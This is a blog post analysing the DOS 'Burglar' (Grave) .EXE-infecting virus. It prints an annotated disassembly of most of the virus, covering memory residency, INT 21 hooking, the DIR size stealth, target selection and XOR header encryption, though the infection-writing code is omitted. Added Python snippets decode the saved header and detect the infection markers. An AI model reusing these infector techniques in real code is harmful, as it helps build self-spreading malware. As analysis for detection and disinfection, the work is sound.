Friday, 11 November 2011

Burglar virus analysis and prevention

Virus description:
The Burglar virus is also called the Grave virus because it contains the string "Grave". Its length is 1150 bytes, so it is sometimes also called the 1150 virus. It infects DOS .EXE files and does not infect Windows executables. While the virus is in memory the UMBs cannot be found, and running Windows 95 frequently crashes.
Virus analysis:
1. The virus's loader section
9F6A:0000 E95A03 JMP 035D
9F6A:0003 90 41 54 20 54-48 45 20 47 52 41 56 45 .AT THE GRAVE
9F6A:0010 20 4F 46 20 47 52 41 4E-44 4D 41 2E 2E 2E  OF GRANDMA...

; Because the string "At the grave of grandma" can be seen in the virus, it is also called the Grave virus...

9F6A:035D 90 NOP
9F6A:035E 90 NOP
9F6A:035F BE0600 MOV SI,0000 ===> ; this value (0000) is set at infection time
9F6A:0362 8BFE MOV DI,SI ; decrypt the original file header
9F6A:0364 E88600 CALL 03ED ; the virus encrypts the original file header information when it saves it,
9F6A:0367 56 PUSH SI ; so it must be decrypted before use

; MOV AX,F078 followed by INT 21H is how the virus checks whether it is already resident in memory; this can also be used to determine whether the virus is in memory

9F6A:0368 B430 MOV AH,30
9F6A:036A 80C448 ADD AH,48
9F6A:036D B0F0 MOV AL,F0
9F6A:036F 86E0 XCHG AH,AL
9F6A:0371 CD21 INT 21 ; residency check
9F6A:0373 0BC0 OR AX,AX ; already resident: go to 03C8
9F6A:0375 7451 JZ 03C8

9F6A:0377 BF7777 MOV DI,7777
9F6A:037A 90 NOP
9F6A:037B 4F DEC DI
9F6A:037C 90 NOP
9F6A:037D 90 NOP
9F6A:037E 75FA JNZ 037A

9F6A:0380 1E PUSH DS ; program PSP segment address - 1 is the memory control block
9F6A:0381 8CC3 MOV BX,ES
9F6A:0383 4B DEC BX
9F6A:0384 8EDB MOV DS,BX ; MCB address
9F6A:0386 BB0200 MOV BX,0002 ; is this the last MCB?
9F6A:0389 807FFE5A CMP Byte Ptr [BX-02],5A ; if not, do not go resident
9F6A:038D 7536 JNZ 03C5

9F6A:038F B95600 MOV CX,0056 ; take 0560H bytes of memory
9F6A:0392 294F01 SUB [BX+01],CX ; shrink this memory block by 0560H bytes
9F6A:0395 294F10 SUB [BX+10],CX
9F6A:0398 8E4710 MOV ES,[BX+10]

; Because the virus cuts the last memory control block short, the system's conventional memory becomes separated from the UMBs. As a result, while the virus is resident in memory, MEM or MI will not show the UMBs; this can also be used to determine whether the virus is in memory

9F6A:039B 33C0 XOR AX,AX
9F6A:039D 8ED8 MOV DS,AX
9F6A:039F C5878200 LDS AX,[BX+0082]
9F6A:03A3 2E8984A700 MOV CS:[SI+00A7],AX ; intercept INT 21
9F6A:03A8 2E8C9CA900 MOV CS:[SI+00A9],DS
9F6A:03AD 0E PUSH CS
9F6A:03AE 1F POP DS
9F6A:03AF 33FF XOR DI,DI
9F6A:03B1 B93505 MOV CX,0535 ; go resident in memory
9F6A:03B4 FC CLD
9F6A:03B5 F3 REPZ
9F6A:03B6 A4 MOVSB
9F6A:03B7 8ED9 MOV DS,CX
9F6A:03B9 FA CLI
9F6A:03BA 8C878400 MOV [BX+0084],ES ; set the new INT 21 to CS:0058
9F6A:03BE C78782005800 MOV Word Ptr [BX+0082],0058
9F6A:03C4 FB STI
9F6A:03C5 07 POP ES
9F6A:03C6 06 PUSH ES
9F6A:03C7 1F POP DS
9F6A:03C8 90 NOP
9F6A:03C9 5E POP SI
9F6A:03CA 90 NOP
9F6A:03CB 8CC3 MOV BX,ES ; relocate CS:IP and SS:SP
9F6A:03CD 83C310 ADD BX,+10
9F6A:03D0 2E019C0B04 ADD CS:[SI+040B],BX
9F6A:03D5 2E019C0304 ADD CS:[SI+0403],BX
9F6A:03DA 2E8E940304 MOV SS,CS:[SI+0403]
9F6A:03DF 2E8BA40504 MOV SP,CS:[SI+0405]
9F6A:03E4 33C0 XOR AX,AX
9F6A:03E6 33DB XOR BX,BX ; run the original program
9F6A:03E8 2EFFAC0904 JMP FAR CS:[SI+0409]

;======================================================================
; Encrypt/decrypt the original file header
; The virus encrypts the original file header by XORing, word by word, 000A * 2 bytes of the header with 7776; this is also how the original file header is decrypted when disinfecting
9F6A:03ED 50 PUSH AX
9F6A:03EE 81C70304 ADD DI,0403
9F6A:03F2 B90A00 MOV CX,000A
9F6A:03F5 B87677 MOV AX,7776
9F6A:03F8 90 NOP
9F6A:03F9 2E3105 XOR CS:[DI],AX
9F6A:03FC 47 INC DI
9F6A:03FD 90 NOP
9F6A:03FE E2F9 LOOP 03F9
9F6A:0400 58 POP AX
9F6A:0401 C3 RET
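
An added example (not part of the original article): a Python emulation of the routine at 03ED-0401, the step a disinfector has to reproduce to read the saved host header fields. It follows the listing literally (one word XOR with 7776 at CS:[DI], DI advanced by one, 000A iterations) and runs on the 11 bytes shown at 0403-040D in the data dump on this page; the function names and the label for the word at 0407 are assumptions of this example.

```python
import struct

XOR_KEY = 0x7776     # MOV AX,7776 at 03F5
ITERATIONS = 0x000A  # MOV CX,000A at 03F2
SAVED_OFF = 0x0403   # ADD DI,0403 at 03EE (relative to the virus start)

# Bytes 0403..040D as they appear in the dump on this page.
SAVED_BLOCK = bytes.fromhex("BC0681019C8801010101E7")


def xor_saved_header(block: bytes) -> bytes:
    """Emulate the loop at 03F9-03FE on a copy of `block`.

    Each pass XORs a 16-bit little-endian word at DI and then advances DI
    by ONE byte (a single INC DI), so successive words overlap and
    ITERATIONS + 1 bytes are touched in total.
    """
    if len(block) < ITERATIONS + 1:
        raise ValueError("need at least %d bytes" % (ITERATIONS + 1))
    buf = bytearray(block)
    for di in range(ITERATIONS):
        word = buf[di] | (buf[di + 1] << 8)
        word ^= XOR_KEY
        buf[di] = word & 0xFF
        buf[di + 1] = word >> 8
    return bytes(buf)


def effective_mask() -> bytes:
    """Net XOR applied to each byte by the listed loop."""
    return xor_saved_header(bytes(ITERATIONS + 1))


def parse_saved_header(block: bytes) -> dict:
    """Decode the block and split it into the fields the loader uses.

    The loader reads SS at 0403, SP at 0405 and a far pointer (IP, CS)
    at 0409. The word at 0407 is not referenced in the listing, so it is
    returned under a neutral name (assumption of this example).
    """
    plain = xor_saved_header(block)
    ss, sp, word_0407, ip, cs = struct.unpack_from("<5H", plain, 0)
    return {"ss": ss, "sp": sp, "word_0407": word_0407, "ip": ip, "cs": cs}


if __name__ == "__main__":
    print("mask   :", effective_mask().hex(" "))
    print("decoded:", xor_saved_header(SAVED_BLOCK).hex(" "))
    for name, value in parse_saved_header(SAVED_BLOCK).items():
        print("%-9s = %04X" % (name, value))
```

The decoded SS and CS are load-relative values: the loader at 03CB-03D5 adds the PSP segment + 10 to both before using them. Running the routine a second time restores the stored form, which is why the virus uses the same subroutine in both directions.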
2. The virus's propagation section

;=========================================================================
; The new INT 21 handling of functions 11 and 12. These two DOS functions are commonly used by the DIR command. Before the directory entry is returned, the virus subtracts 1150 bytes from the length of an infected file, so the DIR command does not show the increase in the infected file's length

9F6A:001E 2EFF1EA700 CALL FAR CS:[00A7] ; call the original DOS function
9F6A:0023 9C PUSHF
9F6A:0024 3CFF CMP AL,FF ; on failure go to 0054 and exit
9F6A:0026 742C JZ 0054
9F6A:0028 90 NOP
9F6A:0029 50 PUSH AX
9F6A:002A 56 PUSH SI
9F6A:002B 1E PUSH DS
9F6A:002C 2E8B362F05 MOV SI,CS:[052F] ; get the DTA address
9F6A:0031 2E8E1E3105 MOV DS,CS:[0531]
9F6A:0036 803CFF CMP Byte Ptr [SI],FF
9F6A:0039 7503 JNZ 003E ; extended FCB?
9F6A:003B 83C607 ADD SI,+07 ; yes: go to 0054
9F6A:003E 8A4417 MOV AL,[SI+17] ; infection marker
9F6A:0041 241D AND AL,1D
9F6A:0043 3C1D CMP AL,1D
9F6A:0045 750A JNZ 0051
9F6A:0047 90 NOP
9F6A:0048 816C1D7E04 SUB Word Ptr [SI+1D],047E
9F6A:004D 835C1F00 SBB Word Ptr [SI+1F],+00
9F6A:0051 1F POP DS ; if infected,
9F6A:0052 5E POP SI ; file length - 1150 bytes
9F6A:0053 58 POP AX
9F6A:0054 9D POPF
9F6A:0055 CA0200 RETF 0002 ; INT 21 return
;====================================================================
; New INT 21 interrupt entry
;====================================================================
9F6A:0058 2EC606330500 MOV Byte Ptr CS:[0533],00
9F6A:005E 9C PUSHF
9F6A:005F 3D78F0 CMP AX,F078 ; residency check
9F6A:0062 90 NOP ; entry: AX = F078
9F6A:0063 7506 JNZ 006B ; returns AX = 0000
9F6A:0065 33C0 XOR AX,AX
9F6A:0067 9D POPF
9F6A:0068 CF IRET
9F6A:0069 90 NOP
9F6A:006A 90 NOP
9F6A:006B 90 NOP
9F6A:006C 80FC11 CMP AH,11 ; functions 11, 12 (DIR)
9F6A:006F 74AD JZ 001E ; go to 001E
9F6A:0071 80FC12 CMP AH,12
9F6A:0074 74A8 JZ 001E
9F6A:0076 80FC3D CMP AH,3D ; open file
9F6A:0079 7442 JZ 00BD
9F6A:007B 80FC43 CMP AH,43 ; get/set file attributes
9F6A:007E 743D JZ 00BD
9F6A:0080 80FC13 CMP AH,13 ; delete file using FCB
9F6A:0083 7432 JZ 00B7
9F6A:0085 80FC36 CMP AH,36 ; get free disk space
9F6A:0088 742D JZ 00B7
9F6A:008A 80FC4B CMP AH,4B ; execute file
9F6A:008D 90 NOP ; functions 13/36: look on the disk
9F6A:008E 90 NOP ; for a file to infect
9F6A:008F 742C JZ 00BD ; functions 3D/43/4B/6C infect directly
9F6A:0091 80FC6C CMP AH,6C
9F6A:0094 7427 JZ 00BD
9F6A:0096 80FC1A CMP AH,1A
9F6A:0099 750A JNZ 00A5 ; set DTA address:
9F6A:009B 2E89162F05 MOV CS:[052F],DX ; save the DTA address at 052F
9F6A:00A0 2E8C1E3105 MOV CS:[0531],DS
9F6A:00A5 9D POPF
9F6A:00A6 EAF8401100 JMP 0011:40F8 ; everything else goes to the original INT 21
9F6A:00AB 90 NOP
9F6A:00AC 90 NOP
; As the code above shows, the virus infects on functions such as opening a file, executing a file, committing a file, changing file attributes and getting free disk space. These functions are used almost one hundred percent of the time while an ordinary file runs, so the virus spreads quickly

;=========================================================================
9F6A:00AD 86E0 XCHG AH,AL ; the virus's own call to INT 21
9F6A:00AF 90 NOP
9F6A:00B0 9C PUSHF
9F6A:00B1 2EFF1EA700 CALL FAR CS:[00A7]
9F6A:00B6 C3 RET
9F6A:00B7 2EC6067E0401 MOV Byte Ptr CS:[047E],01 ; set the DIR-infection flag
;==========================================================================
9F6A:00BD 90 NOP
9F6A:00BE 50 PUSH AX
9F6A:00BF 53 PUSH BX
9F6A:00C0 51 PUSH CX
9F6A:00C1 52 PUSH DX
9F6A:00C2 1E PUSH DS
9F6A:00C3 06 PUSH ES
9F6A:00C4 56 PUSH SI
9F6A:00C5 57 PUSH DI
9F6A:00C6 80FC6C CMP AH,6C ; function 6C passes the file name in DS:SI,
9F6A:00C9 7502 JNZ 00CD ; change it to DS:DX
9F6A:00CB 8BD6 MOV DX,SI
9F6A:00CD 2E803E7E0401 CMP Byte Ptr CS:[047E],01
9F6A:00D3 7406 JZ 00DB ; if infecting during DIR, go to 00DB
9F6A:00D5 E87900 CALL 0151 ; infect the file
9F6A:00D8 EB5C JMP 0136
9F6A:00DA 90 NOP
;========================================================================
9F6A:00DB 0E PUSH CS
9F6A:00DC 1F POP DS
9F6A:00DD C606340500 MOV Byte Ptr [0534],00
9F6A:00E2 B02F MOV AL,2F ; get the DTA address
9F6A:00E4 E8C6FF CALL 00AD
9F6A:00E7 06 PUSH ES
9F6A:00E8 53 PUSH BX
9F6A:00E9 B01A MOV AL,1A ; set the new DTA to 04E5
9F6A:00EB BAE504 MOV DX,04E5
9F6A:00EE E8BCFF CALL 00AD
9F6A:00F1 B04E MOV AL,4E ; find file *.*
9F6A:00F3 B92700 MOV CX,0027
9F6A:00F6 BA2704 MOV DX,0427
9F6A:00F9 E8B1FF CALL 00AD
9F6A:00FC 7230 JB 012E
9F6A:00FE A0FB04 MOV AL,[04FB] ; the file found:
9F6A:0101 241D AND AL,1D ; already infected?
9F6A:0103 3C1D CMP AL,1D
9F6A:0105 7423 JZ 012A ; already infected: find the next file
9F6A:0107 833E010500 CMP Word Ptr [0501],+00
9F6A:010C 7508 JNZ 0116
9F6A:010E 813EFF04E803 CMP Word Ptr [04FF],03E8
9F6A:0114 7214 JB 012A ; file < 03E8: find the next file
9F6A:0116 C70625050305 MOV Word Ptr [0525],0503
9F6A:011C BA0305 MOV DX,0503 ; 0525 is the file name pointer
9F6A:011F E82F00 CALL 0151 ; infect the file
9F6A:0122 2E803E340503 CMP Byte Ptr CS:[0534],03
9F6A:0128 7404 JZ 012E ; 0534 records whether infection succeeded
9F6A:012A B04F MOV AL,4F ; if successful, exit,
9F6A:012C EBCB JMP 00F9 ; otherwise find the next file
9F6A:012E 5A POP DX
9F6A:012F 1F POP DS
9F6A:0130 9C PUSHF
9F6A:0131 B41A MOV AH,1A ; restore the original DTA address
9F6A:0133 CD21 INT 21
9F6A:0135 9D POPF
9F6A:0136 5F POP DI
9F6A:0137 5E POP SI
9F6A:0138 07 POP ES
9F6A:0139 1F POP DS
9F6A:013A 5A POP DX
9F6A:013B 59 POP CX
9F6A:013C 5B POP BX
9F6A:013D 58 POP AX
9F6A:013E 2EC6067E0400 MOV Byte Ptr CS:[047E],00 ; clear the DIR-infection flag
9F6A:0144 2E803E330501 CMP Byte Ptr CS:[0533],01 ;????
9F6A:014A 7502 JNZ 014E
9F6A:014C 33DB XOR BX,BX
9F6A:014E E954FF JMP 00A5
;==================================================================
; File infection subroutine
9F6A:0151 8BF2 MOV SI,DX
9F6A:0153 2E89162505 MOV CS:[0525],DX
9F6A:0158 90 NOP ; this loop finds,
9F6A:0159 AC LODSB ; in the full path name,
9F6A:015A 0AC0 OR AL,AL ; the start address of the file name => 0525
9F6A:015C 740F JZ 016D
9F6A:015E 3C5C CMP AL,5C ; '\'
9F6A:0160 7404 JZ 0166
9F6A:0162 3C3A CMP AL,3A ; ':'
9F6A:0164 75F3 JNZ 0159
9F6A:0166 2E89362505 MOV CS:[0525],SI ; 0525 is the pointer to the start of the file name
9F6A:016B EBEC JMP 0159

9F6A:016D 80FC4B CMP AH,4B ; execute file: go to 0182
9F6A:0170 90 NOP
9F6A:0171 740F JZ 0182
9F6A:0173 817CFB2E45 CMP Word Ptr [SI-05],452E ; "E."
9F6A:0178 7507 JNZ 0181
9F6A:017A 817CFD5845 CMP Word Ptr [SI-03],4558 ; "EX"
9F6A:017F 7401 JZ 0182 ; extension is .EXE: go infect
9F6A:0181 C3 RET
9F6A:0182 0E PUSH CS ; decide whether to infect the file
9F6A:0183 07 POP ES
9F6A:0184 2E8B362505 MOV SI,CS:[0525]
9F6A:0189 BF0E04 MOV DI,040E
9F6A:018C AD LODSW
9F6A:018D B90700 MOV CX,0007 ; files whose names begin with
9F6A:0190 F2 REPNZ ; LC,WH,BT,-F,CW,KT
9F6A:0191 AF SCASW ; are not infected
9F6A:0192 7417 JZ 01AB
9F6A:0194 2E8B362505 MOV SI,CS:[0525]
9F6A:0199 AC LODSB
9F6A:019A 3C00 CMP AL,00
9F6A:019C 740A JZ 01A8
9F6A:019E 3C56 CMP AL,56 ; file names containing
9F6A:01A0 7409 JZ 01AB ; the letters V and S are not infected
9F6A:01A2 3C53 CMP AL,53
9F6A:01A4 7405 JZ 01AB
9F6A:01A6 EBF1 JMP 0199
9F6A:01A8 E80100 CALL 01AC ; infect files with any other name
9F6A:01AB C3 RET
;======================================================================
; Start infecting the executable file
;======================================================================
9F6A:01AC 8CDB MOV BX,DS ; set the new INT 24
9F6A:01AE 33C0 XOR AX,AX ; to CS:042B
9F6A:01B0 8ED8 MOV DS,AX
9F6A:01B2 FF369000 PUSH [0090]
9F6A:01B6 FF369200 PUSH [0092]
9F6A:01BA C70690002B04 MOV Word Ptr [0090],042B
9F6A:01C0 8C0E9200 MOV [0092],CS
9F6A:01C4 8EDB MOV DS,BX
9F6A:01C6 B84300 MOV AX,0043 ; get file attributes
9F6A:01C9 E8E1FE CALL 00AD
9F6A:01CC 1E PUSH DS
9F6A:01CD 52 PUSH DX
9F6A:01CE 51 PUSH CX
9F6A:01CF 33C9 XOR CX,CX ; set the file attributes
9F6A:01D1 B84301 MOV AX,0143 ; to read/write
9F6A:01D4 E8D6FE CALL 00AD
9F6A:01D7 7308 JNB 01E1
9F6A:01D9 2EFE063405 INC Byte Ptr CS:[0534]
9F6A:01DE EB65 JMP 0245
9F6A:01E0 90 NOP
9F6A:01E1 B83D02 MOV AX,023D ; open the file
9F6A:01E4 E8C6FE CALL 00AD
9F6A:01E7 7309 JNB 01F2
9F6A:01E9 2EFE063405 INC Byte Ptr CS:[0534]
9F6A:01EE EB55 JMP 0245
9F6A:01F0 90 NOP
9F6A:01F1 90 NOP
9F6A:01F2 93 XCHG AX,BX
9F6A:01F3 B85700 MOV AX,0057 ; get the file time
9F6A:01F6 E8B4FE CALL 00AD
9F6A:01F9 2E890E2905 MOV CS:[0529],CX
9F6A:01FE 52 PUSH DX
9F6A:01FF 90 NOP
9F6A:0200 0E PUSH CS
9F6A:0201 1F POP DS
9F6A:0202 0E PUSH CS
9F6A:0203 07 POP ES
9F6A:0204 B03F MOV AL,3F ; read 66H bytes of the file header
9F6A:0206 BA7F04 MOV DX,047F ; to 047F
9F6A:0209 B96600 MOV CX,0066
9F6A:020C E89EFE CALL 00AD
9F6A:020F A17F04 MOV AX,[047F]
9F6A:0212 90 NOP
9F6A:0213 3D5A4D CMP AX,4D5A ; .EXE file: go to 0222
9F6A:0216 90 NOP
9F6A:0217 7409 JZ 0222
9F6A:0219 3D4D5A CMP AX,5A4D
9F6A:021C 90 NOP
9F6A:021D 7403 JZ 0222
9F6A:021F EB14 JMP 0235 ; non-.EXE files are not infected
9F6A:0221 90 NOP
;===================================================================
; Infecting the .EXE file
9F6A:0222 A09304 MOV AL,[0493] ; .EXE file infection marker
9F6A:0225 3478 XOR AL,78 ; in the file header, IP xor CRC = 78
9F6A:0227 38069104 CMP [0491],AL
9F6A:022B 7408 JZ 0235 ; not infected: go to 025D
9F6A:022D EB2E JMP 025D
9F6A:022F 90 NOP ; infection succeeded: set the infection marker
9F6A:0230 830E29051D OR Word Ptr [0529],+1D ; time set to 1D
9F6A:0235 5A POP DX
9F6A:0236 8B0E2905 MOV CX,[0529]
9F6A:023A B85701 MOV AX,0157 ; restore the file time
9F6A:023D E86DFE CALL 00AD
9F6A:0240 B03E MOV AL,3E ; close the file
9F6A:0242 E868FE CALL 00AD
9F6A:0245 B84301 MOV AX,0143 ; restore the file attributes
9F6A:0248 59 POP CX
9F6A:0249 5A POP DX
9F6A:024A 1F POP DS
9F6A:024B E85FFE CALL 00AD
9F6A:024E 33C0 XOR AX,AX ; restore the original INT 24
9F6A:0250 8ED8 MOV DS,AX
9F6A:0252 8F069200 POP [0092]
9F6A:0256 8F069000 POP [0090]
9F6A:025A 0E PUSH CS
9F6A:025B 1F POP DS
9F6A:025C C3 RET
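
An added example (not part of the original article) that turns the two infection markers in the listing into a defensive check: the header test at 0222-022B and the file-time test at 003E-0045, plus the 047E size adjustment made by the DIR hook. The header bytes are the 047F buffer from the dump on this page; the DOS time values, the sizes and all function names are constructed for this example.

```python
VIRUS_LEN = 0x047E  # 1150, SUB Word Ptr [SI+1D],047E at 0048
TIME_MASK = 0x1D    # AND AL,1D / CMP AL,1D at 0041-0043, OR ...,+1D at 0230
HDR_BASE = 0x047F   # the virus reads the file header into this buffer

# First 1Ch bytes of the 047F buffer as shown in the dump on this page.
INFECTED_HEADER = bytes.fromhex(
    "4D5AC40128000000" "02003D0BFFFFB204" "8404" "7E89" "0600" "B204" "1C000000"
)
# Constructed samples: 12:30:58 carries the marker bits, 12:30:00 does not.
MARKED_TIME = (12 << 11) | (30 << 5) | 29
PLAIN_TIME = (12 << 11) | (30 << 5) | 0
CLEAN_HEADER = b"MZ" + bytes(26)  # constructed, checksum and IP both zero


def has_time_marker(dos_time: int) -> bool:
    """File-time test used by the DIR hook and by the infection routine."""
    return (dos_time & TIME_MASK) == TIME_MASK


def has_header_marker(header: bytes) -> bool:
    """Header test at 0222-022B: byte [0493] XOR 78 equals byte [0491]."""
    if len(header) < 0x16 or header[:2] not in (b"MZ", b"ZM"):
        return False
    ip_low = header[0x0493 - HDR_BASE]
    crc_low = header[0x0491 - HDR_BASE]
    return (ip_low ^ 0x78) == crc_low


def size_shown_by_dir(real_size: int, dos_time: int) -> int:
    """Model of the function 11/12 hook while the virus is resident.

    The hook looks only at the time bits, so ANY directory entry with the
    marker is reported 047E bytes short, infected or not.
    """
    if has_time_marker(dos_time):
        return (real_size - VIRUS_LEN) & 0xFFFFFFFF
    return real_size


def triage(header, dos_time, size_clean_boot=None, size_live=None) -> dict:
    """Combine the indicators; sizes are optional (clean boot vs. live DIR)."""
    hdr = has_header_marker(header)
    tim = has_time_marker(dos_time)
    resident = (
        size_clean_boot is not None
        and size_live is not None
        and size_live != size_clean_boot
        and size_live == size_shown_by_dir(size_clean_boot, dos_time)
    )
    # The time bits alone match 2 of 32 seconds values, so one marker by
    # itself is only a hint; both together are what the virus itself sets.
    if hdr and tim:
        verdict = "infected"
    elif hdr or tim:
        verdict = "suspicious"
    else:
        verdict = "no marker"
    return {"header_marker": hdr, "time_marker": tim,
            "resident_hint": resident, "verdict": verdict}


if __name__ == "__main__":
    print(triage(INFECTED_HEADER, MARKED_TIME, 20420, 19270))
    print(triage(CLEAN_HEADER, PLAIN_TIME))
```

A size that differs by exactly 1150 bytes between a clean boot and the running system, on a file whose time carries the marker, points at the resident DIR hook rather than at the file alone.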
;======================================================================
; Begin infecting the .EXE file
9F6A:025D BE7F04 MOV SI,047F ; SI points to the file header
9F6A:0260 90 NOP
9F6A:0261 C70627050000 MOV Word Ptr [0527],0000
9F6A:0267 8B543C MOV DX,[SI+3C] ; get the NE header offset
9F6A:026A 8B4C3E MOV CX,[SI+3E]
9F6A:026D B80042 MOV AX,4200
9F6A:0270 CD21 INT 21
9F6A:0272 B90200 MOV CX,0002 ; read 2 bytes of the NE header
9F6A:0275 BA2705 MOV DX,0527
9F6A:0278 B43F MOV AH,3F
9F6A:027A CD21 INT 21
9F6A:027C 813E27054E45 CMP Word Ptr [0527],454E
9F6A:0282 7502 JNZ 0286 ; "NE" new-format files
9F6A:0284 EBAF JMP 0235 ; are not infected
9F6A:0286 B002 MOV AL,02 ; function 4202
9F6A:0288 E8C900 CALL 0354 ; get the file length
9F6A:028B 83FA06 CMP DX,+06 ; > 393216 bytes: do not infect
9F6A:028E 77A5 JA 0235
9F6A:0290 0BD2 OR DX,DX
9F6A:0292 7507 JNZ 029B
9F6A:0294 3D0001 CMP AX,0100 ; < 256 bytes: do not infect
9F6A:0297 7702 JA 029B
9F6A:0299 EB9A JMP 0235
9F6A:029B 52 PUSH DX
9F6A:029C 50 PUSH AX
9F6A:029D 8B4404 MOV AX,[SI+04]
9F6A:02A0 8B7C02 MOV DI,[SI+02]
9F6A:02A3 0BFF OR DI,DI
9F6A:02A5 7401 JZ 02A8
9F6A:02A7 48 DEC AX
9F6A:02A8 B90002 MOV CX,0200
9F6A:02AB F7E1 MUL CX
9F6A:02AD 03C7 ADD AX,DI
9F6A:02AF 83D200 ADC DX,+00
9F6A:02B2 5F POP DI
9F6A:02B3 3BF8 CMP DI,AX ; if the file has an overlay part,
9F6A:02B5 5F POP DI ; do not infect
9F6A:02B6 75E1 JNZ 0299
9F6A:02B8 3BFA CMP DI,DX
9F6A:02BA 75DD JNZ 0299
...
; The code that actually infects the file is not the subject of this article, so it is omitted...
; After infection completes, the virus moves on to its payload; this virus's payload is not malicious
9F6A:0329 B42C MOV AH,2C ; get the system time
9F6A:032B CD21 INT 21
9F6A:032D 80F90E CMP CL,0E ; trigger when the minute is 14
9F6A:0330 751F JNZ 0351
9F6A:0332 BE1E04 MOV SI,041E ; in the top-left corner of the screen
9F6A:0335 B800B8 MOV AX,B800 ; print the word Burglar
9F6A:0338 8ED8 MOV DS,AX
9F6A:033A 33FF XOR DI,DI
9F6A:033C B90900 MOV CX,0009
9F6A:033F 2E8A04 MOV AL,CS:[SI]
9F6A:0342 46 INC SI
9F6A:0343 8805 MOV [DI],AL
9F6A:0345 47 INC DI ; attribute: highlighted and blinking
9F6A:0346 C6058F MOV Byte Ptr [DI],8F
9F6A:0349 47 INC DI
9F6A:034A E2F3 LOOP 033F
9F6A:034C B97777 MOV CX,7777 ; delay
9F6A:034F E2FE LOOP 034F
9F6A:0351 E9DCFE JMP 0230
;===================================================================
; Move-file-pointer subroutine
9F6A:0354 33C9 XOR CX,CX
9F6A:0356 33D2 XOR DX,DX
9F6A:0358 B442 MOV AH,42
9F6A:035A CD21 INT 21
9F6A:035C C3 RET

9F6A:0402 90 BC 06 81 01 9C-88 01 01 01 01 E7 43 4C .<.........gCL
9F6A:0410 48 57 54 42 46 2D 57 43-54 4B 00 00 00 00 42 75 HWTBF-WCTK....Bu
9F6A:0420 72 67 6C 61 72 2F 48 2A-2E 2A 00 32 C0 CF 00 00 rglar/H*.*.2@O..
9F6A:0430 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0440 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0450 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0460 00 00 00 00 78 F0 00 00-19 04 0C 00 00 00 BC 15 ....xp........<.
9F6A:0470 BC 15 06 70 A3 10 78 03-8A 17 65 0F 05 00 00
9F6A:047F 4D <..p#.x...e....M
9F6A:0480 5A C4 01 28 00 00 00 02-00 3D 0B FF FF B2 04 84 ZD.(.....=...2..
9F6A:0490 04 7E 89 06 00 B2 04 1C-00 00 00 64 69 65 74 F9 .~...2.....diety
9F6A:04A0 9C EB 09 69 42 0A 00 A8-B8 55 F8 9C 06 1E 57 56 .k.iB..(8Ux...WV
9F6A:04B0 52 51 53 50 0E FC 8C C8-BA 52 07 03 D0 52 BA 79 RQSP.|.H:R..PR:y
9F6A:04C0 06 52 BA BC 04 03 C2 8B-D8 05 0E 03 8E DB 8E C0 .R:<..BX...[.@
9F6A:04D0 33 F6 33 FF B9 08 00 F3-A5 4B 48 4A 79 EE 8E C3 3v3.9..s%KHJyn.C
9F6A:04E0 8E D8 BE 67 00 .X>g.
9F6A:04E5 01 3F 3F-3F 3F 3F 3F 3F 3F 3F 3F .??????????
9F6A:04F0 3F 27 0D 00 00 00 12 E0-1E 00 20 FA 99 27 21 67 ?'.....`.. z.'!g
9F6A:0500 59 00 00 56 49 52 2E 4C-53 54 00 45 00 00 00 00 Y..VIR.LST.E....
9F6A:0510 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
9F6A:0520 00 00 00 00 00 38 05 00-00 7D 97 00 00 00 00 80 .....8...}......
9F6A:0530 00 6F 18 00 03 00 00 00-00 00 00 00 00 00 00 00 .o..............
9F6A:0540 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
